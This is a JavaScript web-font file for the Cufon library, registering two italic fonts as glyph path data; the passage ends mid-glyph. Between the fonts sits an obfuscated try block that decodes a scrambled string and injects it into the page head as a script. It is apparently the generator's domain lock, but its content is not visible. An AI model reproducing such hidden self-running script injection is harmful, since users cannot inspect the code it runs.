9,129v0,23,16,40,39,40v36,0,54,-25,60,-58r30,0v-5,51,-38,85,-91,85v-38,0,-71,-23,-71,-64v-1,-66,87,-72,92,-132r30,0xm134,-186r-9,40r-39,0r8,-40r40,0"},{"d":"3,0r54,-257r37,0r92,213r43,-213r33,0r-54,257r-37,0r-92,-211r-43,211r-33,0xm141,-271r30,-39r43,0r-45,39r-28,0","w":259},{"d":"91,-263r-69,334r-68,0r5,-23r39,0r59,-288r-39,0r5,-23r68,0","w":93},{"d":"85,-228r-19,89r77,0v54,0,63,-32,63,-50v-2,-57,-70,-34,-121,-39xm3,0r54,-257v80,4,181,-21,183,65v0,34,-23,65,-57,70v47,15,12,82,26,122r-35,0v-3,-9,-5,-29,0,-55v11,-61,-23,-55,-38,-55r-76,0r-23,110r-34,0","w":246},{"d":"69,0r22,-103r-67,-154r36,0r53,125r97,-125r40,0r-125,154r-22,103r-34,0","w":219},{"d":"9,-129v0,-76,61,-134,135,-134v73,0,135,58,135,134v0,77,-62,135,-135,135v-74,0,-135,-58,-135,-135xm33,-129v0,66,48,115,111,115v62,0,111,-49,111,-115v0,-64,-49,-114,-111,-114v-63,0,-111,50,-111,114xm92,-50r0,-157v52,0,116,-8,116,45v0,28,-19,39,-42,42r45,70r-26,0r-43,-68r-26,0r0,68r-24,0xm116,-188r0,50v30,-2,68,9,67,-25v-1,-33,-37,-24,-67,-25","w":288},{"d":"3,0r54,-257r90,0v64,0,97,37,97,98v0,97,-58,159,-143,159r-98,0xm84,-228r-42,199r60,0v73,0,108,-64,108,-126v0,-38,-14,-73,-71,-73r-55,0","w":253},{"d":"164,-114v0,-30,-15,-49,-48,-49v-46,0,-73,53,-73,92v0,28,17,48,47,48v49,0,74,-50,74,-91xm-18,71r55,-257r29,0v-1,8,-7,20,-6,27v39,-60,134,-29,134,45v0,57,-38,118,-103,118v-24,1,-50,-9,-59,-32r-19,99r-31,0","w":213},{"d":"108,-163v-73,0,-106,140,-20,140v45,0,69,-51,69,-88v0,-29,-16,-52,-49,-52xm6,-73v0,-61,39,-117,104,-117v50,0,78,27,78,77v0,61,-38,117,-103,117v-49,0,-79,-32,-79,-77","w":206},{"d":"-8,-86r5,-28r360,0r-5,28r-360,0","w":360},{"w":100},{"d":"29,0r-31,0r39,-186r31,0xm53,-257r20,51r-24,0r-36,-51r40,0","w":79},{"d":"40,-111r108,0v2,-26,-10,-52,-44,-52v-36,0,-55,23,-64,52xm175,-84r-140,0v-17,69,84,81,101,26r31,0v-10,41,-44,62,-85,62v-62,0,-78,-43,-78,-75v0,-71,44,-119,95,-119v64,0,87,46,76,106xm126,-213r8,-37r32,0r-8,37r-32,0xm68,-213r8,-37r32,0r-8,37r-32,0","w":193},{"d":"9,-86r6,-28r105,0r-6,28r-105,0","w":140},{"d":"29,0r-31,0r39,-186r31,0xm22,-223r4,-20r72,0r-4,20r-72,0","w":79},{"d":"67,-257r20,51r-24,0r-36,-51r40,0","w":79},{"d":"79,-106r88,0r-19,-121xm-20,0r155,-257r37,0r47,257r-35,0r-12,-77r-109,0r-45,77r-38,0xm135,-271r30,-39r43,0r-45,39r-28,0","w":240},{"d":"37,0r10,-74r-35,0r3,-25r35,0r8,-54r-36,0r3,-24r37,0r10,-74r25,0r-11,74r44,0r11,-74r25,0r-11,74r33,0r-3,24r-33,0r-8,54r34,0r-3,25r-34,0r-10,74r-25,0r10,-74r-44,0r-10,74r-25,0xm127,-153r-44,0r-7,54r44,0"},{"d":"37,-72v0,30,15,49,48,49v46,0,72,-53,72,-92v0,-28,-16,-48,-46,-48v-49,0,-74,50,-74,91xm218,-257r-54,257r-29,0r6,-27v-39,59,-135,30,-135,-45v0,-57,38,-118,103,-118v24,-1,50,9,59,32r20,-99r30,0","w":213},{"d":"51,56r37,-177v-44,0,-69,-30,-62,-67v14,-76,95,-71,182,-69r-65,313r-23,0r61,-293r-46,0r-60,293r-24,0","w":216},{"d":"203,0r-2,-26v-19,22,-49,32,-77,32v-70,0,-110,-42,-110,-113v0,-83,53,-156,141,-156v57,0,103,27,103,86r-34,0v0,-39,-32,-57,-69,-57v-72,0,-107,65,-107,127v0,50,25,84,76,84v54,0,81,-34,93,-84r-82,0r5,-28r112,0r-28,135r-21,0xm117,-310r18,0v8,27,63,21,76,0r18,0v-5,43,-118,55,-112,0","w":273},{"d":"153,-135r-106,96v8,10,22,16,41,16v52,-3,79,-64,65,-112xm40,-51r107,-96v-8,-9,-21,-16,-39,-16v-54,3,-80,61,-68,112xm-11,-5r28,-25v-33,-69,14,-162,93,-160v27,0,47,7,60,22r25,-22r9,10v-9,7,-17,17,-27,23v32,69,-12,163,-92,161v-26,0,-47,-8,-60,-23r-27,24","w":206},{"d":"117,-51v0,-38,-98,-33,-98,-86v0,-35,34,-53,69,-53v35,0,70,15,70,59r-30,0v1,-21,-18,-32,-39,-32v-19,0,-39,4,-39,23v0,38,98,33,98,87v0,41,-40,57,-76,57v-42,0,-75,-15,-75,-63r30,0v-1,28,22,36,48,36v20,0,42,-7,42,-28xm49,39r5,-25r30,0v-7,26,-10,52,-41,55r2,-11v13,-2,17,-10,19,-19r-15,0","w":173},{"d":"138,-47r-45,-75v-24,12,-55,30,-55,61v0,49,74,46,100,14xm168,0r-15,-27v-38,47,-145,43,-145,-35v0,-43,37,-64,71,-81v-35,-38,-25,-114,43,-114v30,0,59,16,59,49v0,36,-35,57,-64,73r41,66v10,-14,20,-34,22,-52r30,0v-8,34,-20,54,-37,74r30,47r-35,0xm122,-230v-41,0,-38,52,-17,74v18,-10,45,-25,45,-47v0,-16,-12,-27,-28,-27","w":226},{"d":"187,-186r-39,186r-30,0v1,-9,6,-21,5,-28v-24,41,-123,50,-118,-16v4,-46,20,-97,28,-142r31,0r-28,137v0,18,14,26,32,26v76,-4,72,-99,89,-163r30,0xm62,-206r48,-51r31,0r28,51r-28,0r-18,-33r-33,33r-28,0"},{"d":"3,0r54,-257r34,0r-54,257r-34,0xm60,-271r8,-38r32,0r-7,38r-33,0","w":93},{"d":"55,-41r-44,-49r8,-33r62,-36r-7,30r-43,25r31,32xm126,-41r-45,-49r8,-33r63,-36r-8,30r-43,25r31,32","w":166},{"d":"187,-186r-39,186r-30,0v1,-9,6,-21,5,-28v-24,41,-123,50,-118,-16v4,-46,20,-97,28,-142r31,0r-28,137v0,18,14,26,32,26v76,-4,72,-99,89,-163r30,0"},{"d":"70,-113v24,0,57,26,77,26v14,0,23,-15,31,-28r13,18v-11,15,-23,31,-45,31v-37,0,-91,-53,-108,2r-13,-18v8,-15,21,-31,45,-31","w":216},{"d":"-19,0r4,-23r130,-136r-100,0r5,-27r142,0r-5,22r-131,137r112,0r-6,27r-151,0xm73,-206r34,-51r40,0r-49,51r-25,0","w":159},{"d":"129,-95v-28,18,-102,0,-102,46v0,40,72,28,86,2v8,-15,12,-31,16,-48xm159,0v-17,4,-45,26,-47,41v0,7,2,14,23,14v5,0,10,0,17,-1r-4,17v-24,2,-63,4,-63,-25v0,-16,19,-32,40,-46v-6,-4,-10,-12,-9,-23v-23,37,-120,43,-120,-25v0,-54,53,-57,94,-61v32,-3,47,-5,47,-30v0,-41,-84,-28,-87,9r-31,0v6,-41,41,-60,81,-60v36,0,68,9,68,47v0,39,-19,73,-23,111v-2,15,10,13,19,9","w":186},{"d":"142,-263r-4,21v-55,-8,-45,58,-56,97v-10,34,-33,45,-41,50v10,-3,28,24,21,48v-7,25,-11,49,-14,77v-2,20,11,22,29,20r-4,21v-36,4,-62,-7,-55,-47v5,-27,13,-50,15,-80v0,-17,-10,-28,-22,-28r5,-24v38,0,43,-70,52,-108v10,-41,33,-51,74,-47","w":119},{"d":"199,-140r0,101r-25,0r0,-76r-157,0r0,-25r182,0","w":216},{"d":"79,-106r88,0r-19,-121xm219,0v-18,3,-43,27,-44,41v0,7,1,14,22,14v5,0,10,0,17,-1r-3,17v-24,2,-63,4,-63,-25v0,-16,18,-32,39,-46r-3,0r-12,-77r-109,0r-45,77r-38,0r155,-257r37,0","w":240},{"d":"28,6r0,-269r24,0r0,269r-24,0","w":79},{"d":"103,-255r-32,154r-24,0r24,-117v-14,5,-26,6,-43,6r4,-18v26,0,46,-11,54,-25r17,0xm195,-101r-24,0v-6,-59,108,-75,109,-12v1,52,-79,60,-98,93r83,0r-3,20r-107,0v-4,-37,40,-56,68,-76v14,-9,33,-18,33,-36v0,-14,-10,-23,-26,-23v-22,0,-34,15,-35,34xm45,10r156,-271r23,0r-156,271r-23,0","w":300},{"d":"117,-51v0,-38,-98,-33,-98,-86v0,-35,34,-53,69,-53v35,0,70,15,70,59r-30,0v1,-21,-18,-32,-39,-32v-19,0,-39,4,-39,23v0,38,98,33,98,87v0,41,-40,57,-76,57v-42,0,-75,-15,-75,-63r30,0v-1,28,22,36,48,36v20,0,42,-7,42,-28xm159,-257r-48,51r-31,0r-28,-51r27,0r19,33r33,-33r28,0","w":173},{"d":"14,-107v0,-83,53,-156,141,-156v67,0,107,50,107,114v0,81,-52,155,-138,155v-70,0,-110,-42,-110,-113xm48,-107v0,50,25,84,76,84v68,0,104,-65,104,-126v0,-48,-25,-85,-73,-85v-72,0,-107,65,-107,127xm115,-278r4,-20r97,0r-4,20r-97,0","w":273},{"d":"17,-98r0,-24r79,0r0,-60r24,0r0,60r79,0r0,24r-79,0r0,61r-24,0r0,-61r-79,0xm17,0r0,-24r182,0r0,24r-182,0","w":216},{"d":"40,-111r108,0v2,-26,-10,-52,-44,-52v-36,0,-55,23,-64,52xm175,-84r-140,0v-17,69,84,81,101,26r31,0v-10,41,-44,62,-85,62v-62,0,-78,-43,-78,-75v0,-71,44,-119,95,-119v64,0,87,46,76,106","w":193},{"d":"98,-257r-9,41r40,-4r1,17r-38,5r17,36r-17,8r-17,-37r-28,32r-14,-14r28,-30r-34,-17r9,-17r35,18r7,-38r20,0","w":126},{"d":"202,-186r-54,257r-31,0r19,-95v-40,54,-130,25,-130,-52v0,-57,36,-114,98,-114v28,-1,49,9,61,33r6,-29r31,0xm37,-76v0,29,13,53,47,53v49,0,71,-55,71,-95v0,-28,-18,-45,-48,-45v-45,0,-70,48,-70,87","w":213},{"d":"47,-206r34,-51r40,0r-49,51r-25,0","w":79},{"d":"40,-111r108,0v2,-26,-10,-52,-44,-52v-36,0,-55,23,-64,52xm167,-58v-7,55,-78,55,-95,99v0,7,2,14,23,14v5,0,10,0,17,-1r-4,17v-24,2,-63,4,-63,-25v0,-15,15,-29,33,-42v-58,-2,-74,-43,-74,-75v0,-71,44,-119,95,-119v64,0,87,46,76,106r-140,0v-17,69,84,81,101,26r31,0","w":193},{"d":"262,-257r-32,154v-8,69,-48,110,-113,109v-75,0,-108,-40,-93,-112r32,-151r34,0r-34,160v-12,50,11,74,61,74v56,0,68,-32,78,-80r33,-154r34,0xm144,-289v0,9,7,16,17,16v10,0,18,-7,18,-16v0,-10,-8,-18,-18,-18v-10,0,-17,8,-17,18xm133,-289v0,-16,13,-29,28,-29v15,0,29,13,29,29v0,15,-14,28,-29,28v-15,0,-28,-13,-28,-28","w":259},{"d":"-14,0r6,-28r193,-200r-147,0r7,-29r188,0r-6,29r-195,199r165,0r-7,29r-204,0xm121,-271r30,-39r43,0r-45,39r-28,0","w":219},{"d":"180,-127r-30,0v0,-23,-15,-36,-39,-36v-47,0,-73,46,-73,87v0,29,12,53,46,53v26,0,46,-15,55,-38r30,0v-11,41,-42,65,-85,65v-51,0,-76,-30,-76,-80v0,-59,36,-114,103,-114v42,0,68,20,69,63xm93,-206r33,-51r41,0r-49,51r-25,0","w":193},{"d":"-19,0r4,-23r130,-136r-100,0r5,-27r142,0r-5,22r-131,137r112,0r-6,27r-151,0","w":159},{"d":"91,-241r-11,55r37,0r-6,27r-37,0r-24,122v1,16,23,13,36,9r-6,28v-35,8,-70,-2,-61,-44r24,-115r-31,0r6,-27r31,0r11,-55r31,0","w":113},{"d":"-2,0r55,-257r30,0r-32,152r94,-81r40,0r-81,69r46,117r-34,0r-36,-99r-37,33r-14,66r-31,0","w":173},{"d":"187,-186r-39,186r-30,0v1,-9,6,-21,5,-28v-24,41,-123,50,-118,-16v4,-46,20,-97,28,-142r31,0r-28,137v0,18,14,26,32,26v76,-4,72,-99,89,-163r30,0xm66,-205r34,-52r40,0r-49,52r-25,0xm126,-205r33,-52r41,0r-49,52r-25,0"},{"d":"89,-204r-9,40r-40,0v9,-40,10,-89,60,-93r-4,17v-19,3,-24,20,-28,36r21,0","w":100},{"d":"182,-186r-123,218v-16,30,-43,55,-82,39r6,-25v36,20,51,-25,65,-46r-33,-186r33,0r22,148r78,-148r34,0","w":173},{"d":"203,-87r35,0v-13,59,-51,94,-116,93r-11,13v21,-4,42,3,42,25v0,36,-50,38,-78,24r7,-16v13,6,41,11,44,-5v-1,-13,-20,-13,-31,-8r-7,-11r19,-23v-60,-6,-93,-47,-93,-112v0,-83,53,-156,141,-156v55,0,98,30,98,89r-34,0v0,-40,-27,-60,-64,-60v-72,0,-107,65,-107,127v0,50,25,84,76,84v42,0,68,-24,79,-64","w":259},{"d":"0,45r0,-18r180,0r0,18r-180,0","w":180},{"d":"79,-213r8,-37r32,0r-8,37r-32,0xm21,-213r7,-37r32,0r-7,37r-32,0","w":79},{"d":"235,-257r-6,29r-87,0r-48,228r-34,0r48,-228r-86,0r6,-29r207,0xm199,-310r-46,39r-39,0r-30,-39r32,0r19,24r31,-24r33,0","w":206},{"d":"-4,-4r36,-34v-51,-93,11,-225,123,-225v33,0,60,13,78,33r35,-34r11,12r-36,34v53,92,-10,224,-119,224v-37,0,-63,-13,-84,-32r-34,34xm57,-62r153,-146v-12,-16,-31,-26,-55,-26v-87,1,-125,96,-98,172xm218,-195r-153,146v12,16,32,26,59,26v83,-1,124,-98,94,-172","w":273},{"d":"3,0r54,-257r34,0r-54,257r-34,0xm42,-278r4,-20r72,0r-4,20r-72,0","w":93},{"d":"129,-95v-28,18,-102,0,-102,46v0,40,72,28,86,2v8,-15,12,-31,16,-48xm50,-130r-31,0v6,-41,41,-60,81,-60v36,0,68,9,68,47v0,39,-19,73,-23,111v-2,15,10,13,19,9r-5,23v-20,10,-48,2,-43,-23v-23,37,-120,43,-120,-25v0,-54,53,-57,94,-61v32,-3,47,-5,47,-30v0,-41,-84,-28,-87,9xm90,-206r34,-51r41,0r-49,51r-26,0","w":186},{"d":"108,-163v-73,0,-106,140,-20,140v45,0,69,-51,69,-88v0,-29,-16,-52,-49,-52xm6,-73v0,-61,39,-117,104,-117v50,0,78,27,78,77v0,61,-38,117,-103,117v-49,0,-79,-32,-79,-77xm97,-206r34,-51r40,0r-49,51r-25,0","w":206},{"d":"117,-51v0,-38,-98,-33,-98,-86v0,-35,34,-53,69,-53v35,0,70,15,70,59r-30,0v1,-21,-18,-32,-39,-32v-19,0,-39,4,-39,23v0,38,98,33,98,87v0,41,-40,57,-76,57v-42,0,-75,-15,-75,-63r30,0v-1,28,22,36,48,36v20,0,42,-7,42,-28","w":173},{"d":"235,-257r-6,29r-87,0r-48,228r-34,0r48,-228r-86,0r6,-29r207,0xm55,39r6,-25r29,0v-5,27,-9,52,-40,55r2,-11v13,-2,17,-10,19,-19r-16,0","w":206},{"d":"36,-159r44,49r-8,33r-62,36r7,-31r43,-24r-31,-33xm107,-159r44,49r-8,33r-63,36r8,-31r43,-24r-31,-33","w":166},{"d":"69,0r22,-103r-67,-154r36,0r53,125r97,-125r40,0r-125,154r-22,103r-34,0xm162,-271r8,-38r32,0r-8,38r-32,0xm93,-271r7,-38r32,0r-7,38r-32,0","w":219},{"d":"29,0r-31,0r39,-186r31,0xm2,-206r49,-51r31,0r27,51r-27,0r-18,-33r-34,33r-28,0","w":79},{"d":"3,0r54,-257r37,0r92,213r43,-213r33,0r-54,257r-37,0r-92,-211r-43,211r-33,0","w":259},{"d":"-8,-86r5,-28r180,0r-5,28r-180,0","w":180},{"d":"28,-202v0,-30,23,-53,53,-53v30,0,53,23,53,53v0,30,-23,53,-53,53v-30,0,-53,-23,-53,-53xm46,-202v0,20,15,35,35,35v20,0,35,-15,35,-35v0,-20,-15,-35,-35,-35v-20,0,-35,15,-35,35","w":144},{"d":"-14,0r6,-28r193,-200r-147,0r7,-29r188,0r-6,29r-195,199r165,0r-7,29r-204,0xm204,-310r-46,39r-38,0r-31,-39r32,0r19,24r31,-24r33,0","w":219},{"d":"140,-257r0,20r-46,0r0,128r-25,0r0,-128r-46,0r0,-20r117,0xm333,-257r0,148r-24,0r-1,-124r-48,124r-16,0r-49,-124r0,124r-25,0r0,-148r38,0r44,113r44,-113r37,0","w":356},{"d":"90,-23v66,0,80,-115,9,-114v-36,0,-56,29,-56,63v0,30,15,51,47,51xm10,-82v0,-82,33,-173,119,-173v42,0,66,25,67,66r-32,0v0,-26,-13,-39,-40,-39v-48,0,-63,51,-74,89v39,-51,128,-18,128,50v0,53,-35,93,-91,93v-53,0,-77,-37,-77,-86"},{"d":"187,-186r-39,186r-30,0v1,-9,6,-21,5,-28v-24,41,-123,50,-118,-16v4,-46,20,-97,28,-142r31,0r-28,137v0,18,14,26,32,26v76,-4,72,-99,89,-163r30,0xm127,-213r8,-37r32,0r-8,37r-32,0xm69,-213r8,-37r32,0r-8,37r-32,0"},{"d":"187,-186r-39,186r-30,0v1,-9,6,-21,5,-28v-24,41,-123,50,-118,-16v4,-46,20,-97,28,-142r31,0r-28,137v0,18,14,26,32,26v76,-4,72,-99,89,-163r30,0xm113,-257r21,51r-24,0r-36,-51r39,0"},{"d":"91,-241r-11,55r37,0r-6,27r-37,0r-24,122v1,16,23,13,36,9r-6,28v-35,8,-70,-2,-61,-44r24,-115r-31,0r6,-27r31,0r11,-55r31,0xm105,-229r6,-28r30,0v-7,29,-8,64,-43,63r2,-13v14,0,19,-16,20,-22r-15,0","w":113}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-1145-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("-_G;AxWcC`fj-qTXPx(y}_}fzOW;GxfjzOsyC`k*G%?{|.cZzrVydY}OzrV$d9V$zrV$d_VSzrV$d9vbzrV$d_V;V(b;dYv;HrMgP9&bW9TgP9&$|.GgP9&bd`GgP9&bW)ezzrV$d9@bzrV$d9exATb;dYv.H%%gP9&bWYPgP9&$G_%gP9&$|9sgP9&$|.TgP9&bW9(gP9&bW9ktzrV$d_}yzrV$d9GxzrV$d9&$zrV$d_kxA(b;dYexW;b;dYvbWTb;dYe)H(b;dYvyd;b;d)&bH%b;dYeIG(b;dYexdTb;dYeMd;b;dYvbdTb;dYe)|;b;dYeIWq%gP9&bd`(gP9&bd)sgP9&$&eqYv(_r}s-~dWH,@k^9V%`z|GCAgP!>8MZ)ITx*47nU{tj#$by.c;OSu]LX?fpB|O%gP9&bdOvMzrV$d_|OzrV$d_(xH%b;dYeId(b;dYvS|Tb;dYeIdITgP9&$|xWSzrV$d9@czrV$d9@OzrV$d_d$zrV$d9eIzrV$d_@OzrV$d_vOzrV$d9(ZzrV$d_%IzrV$d9&.kTb;dYv.WxWgP9&bdO%gP9&$G`(gP9&bdOWgP9&bWY%gP9&$G9WgP9&$G`GgP9&$G)%gP9&bW.WgP9&bWOWgP9&bW_kgP9&yd9MgP9&$Gx|jzrV$d9eTzrV$d_WIzrV$d_@;zrV$d_|$zrV$d9@uHT7gP9&$G)(g}IPAzrV$d9%xzrV$d9V.zrV$d_sM@c7gP9&$|.%gP9&$G_sgP9&bW.egP9&bW.sgP9&$|x%xW%bgzrV$d9@yzrV$d9%T@(b;dYvO|ZTgP9&$G)kgP9&$|.sgP9&$GxkgP9&$|.WgP9&$|)dudTb;dYv;dTb;dYe)|%b;dYv;WTb;dYv.d%b;dYeTH%b;dYeMd%b;dYeTdTb;dYeId%b;dYex|%b;dYe)GTb;dYv.W;WdzrV$d9VSzrV$d9&b%Tb;dYvOd;b;dYvyGTb;dYe)W(vfk%b;dYeTH_gS9V(gP9&$GYIpP*s|zrV$d_kM%(b;dYvbW;b;dYv$|O(,zrV$d_@.-(b;dYv$WTb;dYv.G(b;dYvyG%b;dYv.|Tb;dYeMW;b;dYeMW%b;dYv;|Tb;dYeMW(b;dYv]d)bgP9}$d`WgP9}$d`kg~y&UC`}*s(b;dYv;|%b;dYvO|%b;dYeTWTb;dYeI|S;gP9&bW9VBzrV$d9v.~_8.W(b;dYvbHYegP9&$|)MgP9&$|`vXzrV$d_v]zrV$d9&yzrV$d_GTzrV$d_WZzrV$d_Vc^;b;dYvbd(]gP9&$|)T}CTb;dYvSG%b;dYeTd(b;dYeZW;b;dYeIWc}bzrV$d_sxzrV$d9@.z%sGzrV$d_(Tkre#zrVydYvczrV$d_v$zrV$d_%)zrV$d_%Z~%b;dYvy|xegP9&$|.v)G(b;dYeZWTb;dYvbG%b;dYexH(b;dY}bH^GgP9&$GxsgP9&bd.egP9&$|`s;>Tb;dYvS|%b;dYv$WztgP9&$|`WgP9&bdYk?zrV$d_sIzrV$d9|bzrV$d9k)zrV$d_}bG^7bzrV$d_}czrV$d9v]zrV$d9GTzrV$d9g]zrV$d9&S!*kUzrV$d9gbzrVydYvu!%b;dYe)W;fgP9&$|9MgP9&bW)kgP9&$GYMgP9&bdx(gP9&$G9(gP9&$G)W.zrV$d9|yzrV$d_sZzrV$d9guzrV$d_%T9Tb;d)&bd;b;dYeZd(b;dYvSG(b;d)vyd)GgP9&$GxWgP9&$G)TgP9&bW)VZ~*W$A_Tc-q}Z-^b7,9&{gY;Z~*&{AY;$~xbTAxPcCqb*,`}jGZ]*ArT$Crdf!ScXC`|4|Z]#C.c#zZ8BH*PSP;$j-9?4,.4j-;$jC`].C`kT|%$j|S7?~Ztg~x7MCSkyC`k7P($j|S7?Cx(UPrs7G_Tczq])!*b7A*W7G_%Mzq])!ZII~OIjP_%.PqM{AOWMP_T#AZ]4ASWcAx(tG^I7Gxfy-Yt7,_$X-yt7-`PA|;t7z%cfg(t7zzc7-qI8")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":200,"face":{"font-family":"Ekokom","font-weight":400,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 3 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"4","bbox":"-46 -318 398 76.0601","underline-thickness":"18","underline-position":"-36","slope":"-12","stemh":"27","stemv":"31","unicode-range":"U+0020-U+2122"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 *
 * Copyright:
 * CZ-3.0, 1992 Adobe Systems Inc., 2003 Quentin spol. s r.o.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"130,-78v28,0,49,-38,49,-64v0,-17,-13,-32,-28,-32v-29,0,-49,36,-49,63v0,19,11,33,28,33xm221,-195r-26,95v-4,11,-6,24,4,24v22,0,48,-33,48,-77v0,-54,-44,-87,-97,-87v-61,0,-104,48,-104,108v0,109,126,150,188,79r25,0v-62,106,-241,57,-241,-80v0,-73,60,-130,132,-130v64,0,120,43,120,105v0,72,-56,108,-85,108v-12,0,-19,-9,-22,-21v-29,38,-92,16,-92,-36v0,-64,79,-133,119,-68r6,-20r25,0","w":288},{"d":"1,0r54,-257r45,0r-54,257r-45,0xm109,-310r28,39r-33,0r-18,-22r-30,22r-35,0r47,-39r41,0","w":100},{"d":"164,-102r-17,-110r-62,110r79,0xm-22,0r154,-257r48,0r45,257r-46,0r-11,-68r-102,0r-39,68r-49,0xm133,-313v27,0,58,35,69,0r20,0v-3,18,-16,43,-37,43v-24,-1,-60,-36,-69,-1r-21,0v5,-20,15,-42,38,-42","w":246},{"d":"197,-186r-39,186r-38,0r5,-28v-23,44,-123,47,-119,-16v4,-52,19,-94,27,-142r41,0r-27,132v0,6,-1,27,29,27v70,0,62,-99,80,-159r41,0xm132,-263r45,0r-42,51r-30,0","w":206},{"d":"11,-106v0,-108,71,-157,138,-157v68,0,112,46,112,112v0,108,-67,157,-136,157v-73,0,-114,-48,-114,-112xm148,-226v-101,0,-134,195,-21,195v59,0,89,-61,89,-118v0,-48,-23,-77,-68,-77","w":273},{"d":"134,-58r41,0v-13,43,-46,63,-90,63v-47,0,-81,-31,-81,-81v0,-57,36,-115,103,-115v75,0,83,57,77,109r-139,0v-2,32,8,55,44,55v22,0,39,-12,45,-31xm49,-109r96,0v3,-30,-10,-49,-39,-50v-31,0,-49,21,-57,50xm95,-212r-28,-51r30,0r19,32r33,-32r33,0r-49,51r-38,0"},{"d":"206,-186r-40,181v-12,57,-35,79,-94,79v-41,0,-79,-16,-80,-60r41,0v1,21,20,29,43,29v44,0,51,-33,56,-71v-36,53,-125,26,-125,-48v0,-56,34,-115,96,-115v27,0,48,10,58,36r6,-31r39,0xm48,-78v0,25,11,46,39,46v44,0,62,-45,62,-83v0,-27,-15,-44,-42,-44v-40,0,-59,47,-59,81xm149,-247r-7,35r-36,0v8,-30,6,-70,47,-72r-3,14v-13,2,-18,11,-20,23r19,0","w":213},{"d":"114,-224r-102,0r5,-23r102,0","w":86},{"d":"115,-54v0,-37,-98,-24,-98,-80v0,-41,39,-57,77,-57v40,0,73,13,72,59r-39,0v0,-19,-15,-27,-37,-27v-16,0,-32,6,-32,24v0,17,29,19,55,29v22,8,43,21,43,50v0,42,-40,60,-80,61r-14,17v20,-3,41,2,41,24v-2,37,-55,37,-81,24r7,-14v15,7,42,11,46,-7v1,-23,-32,-5,-37,-19r21,-26v-36,-3,-62,-19,-63,-64r39,0v-1,23,17,33,41,33v17,0,39,-6,39,-27","w":180},{"d":"11,-106v0,-108,71,-157,138,-157v68,0,112,46,112,112v0,108,-67,157,-136,157v-73,0,-114,-48,-114,-112xm148,-226v-101,0,-134,195,-21,195v59,0,89,-61,89,-118v0,-48,-23,-77,-68,-77xm210,-276r-102,0r4,-23r103,0","w":273},{"d":"0,0r54,-257r45,0r-24,117r131,-117r60,0r-123,106r81,151r-52,0r-64,-123r-45,39r-18,84r-45,0xm78,48r8,-35r36,0v-8,30,-6,70,-47,72r2,-15v13,-2,19,-10,21,-22r-20,0","w":246},{"d":"134,-64r41,0v-13,46,-44,68,-91,69r-15,17v20,-3,42,2,42,24v-2,37,-55,37,-81,24r7,-14v15,7,43,12,45,-7v2,-23,-31,-5,-36,-19r21,-26v-40,-5,-63,-36,-63,-79v0,-63,40,-116,106,-116v41,0,75,22,74,66r-41,0v1,-23,-14,-34,-36,-34v-41,0,-62,47,-62,83v0,65,80,60,89,12"},{"d":"36,-218r8,-39r196,0r-7,37r-184,181r154,0r-8,39r-210,0r8,-37r181,-181r-138,0xm131,-311r40,0r-7,39r-40,0","w":226},{"d":"251,-171r-45,0v0,-36,-21,-55,-58,-55v-101,0,-134,195,-21,195v46,0,61,-41,66,-59r45,0v-15,65,-59,96,-113,96v-73,0,-114,-48,-114,-112v0,-108,71,-157,138,-157v61,0,104,33,102,92","w":259},{"d":"67,-121r-37,0r65,-131r26,0r65,131r-37,0r-41,-85","w":216},{"d":"-4,0r38,-186r39,0v-1,9,-7,20,-5,28v23,-45,122,-47,118,16v-4,52,-19,94,-27,142r-41,0r27,-132v0,-6,2,-27,-28,-27v-71,0,-62,99,-80,159r-41,0xm102,-257v27,0,58,35,69,0r21,0v-3,18,-17,43,-38,43v-24,-1,-60,-36,-69,-1r-21,0v5,-20,15,-42,38,-42","w":206},{"d":"181,-88v-1,57,-53,107,-120,91r6,-32v45,12,74,-23,73,-61v-1,-32,-24,-39,-52,-38r6,-27v31,1,57,-10,58,-44v0,-22,-13,-32,-32,-32v-29,0,-38,18,-44,48r-39,183r-41,0r42,-195v10,-46,40,-68,86,-68v35,0,69,18,69,59v1,32,-24,55,-52,62v27,5,40,27,40,54","w":206},{"d":"86,5v-51,0,-82,-29,-82,-81v0,-61,43,-115,107,-115v51,0,81,28,81,80v0,65,-40,116,-106,116xm108,-159v-42,0,-63,47,-63,84v0,27,13,48,43,48v42,0,63,-46,63,-84v0,-27,-13,-48,-43,-48xm163,-263r45,0r-42,51r-27,0xm90,-263r45,0r-42,51r-27,0","w":213},{"d":"37,0r-41,0r38,-186r41,0","w":86},{"d":"164,-72v0,-67,-132,-22,-132,-111v0,-46,35,-80,96,-80v54,0,97,22,95,82r-43,0v0,-32,-18,-45,-53,-45v-12,0,-50,3,-50,37v0,25,26,32,54,39v36,9,78,19,78,73v0,40,-29,83,-107,83v-60,0,-99,-27,-97,-91r43,0v-2,40,22,54,59,54v24,0,57,-11,57,-41xm113,-272r-28,-38r32,0r19,21r30,-21r35,0r-48,38r-40,0","w":233},{"d":"1,0r54,-257r45,0r-54,257r-45,0xm133,-276r-102,0r4,-23r103,0","w":100},{"d":"179,-148v-3,37,-16,75,-21,112v-1,13,15,8,23,6r-7,30v-23,8,-56,9,-57,-19v-33,36,-120,35,-120,-26v0,-62,62,-64,119,-67v15,-1,22,-10,22,-24v0,-37,-74,-29,-78,6r-39,0v9,-46,44,-61,88,-61v68,0,70,30,70,43xm129,-91v-23,14,-91,-2,-91,40v0,18,18,24,33,24v40,0,53,-29,58,-64xm98,-257v27,0,58,35,69,0r21,0v-3,18,-17,43,-38,43v-24,-1,-60,-36,-69,-1r-21,0v5,-20,15,-42,38,-42"},{"d":"197,-186r-39,186r-38,0r5,-28v-23,44,-123,47,-119,-16v4,-52,19,-94,27,-142r41,0r-27,132v0,6,-1,27,29,27v70,0,62,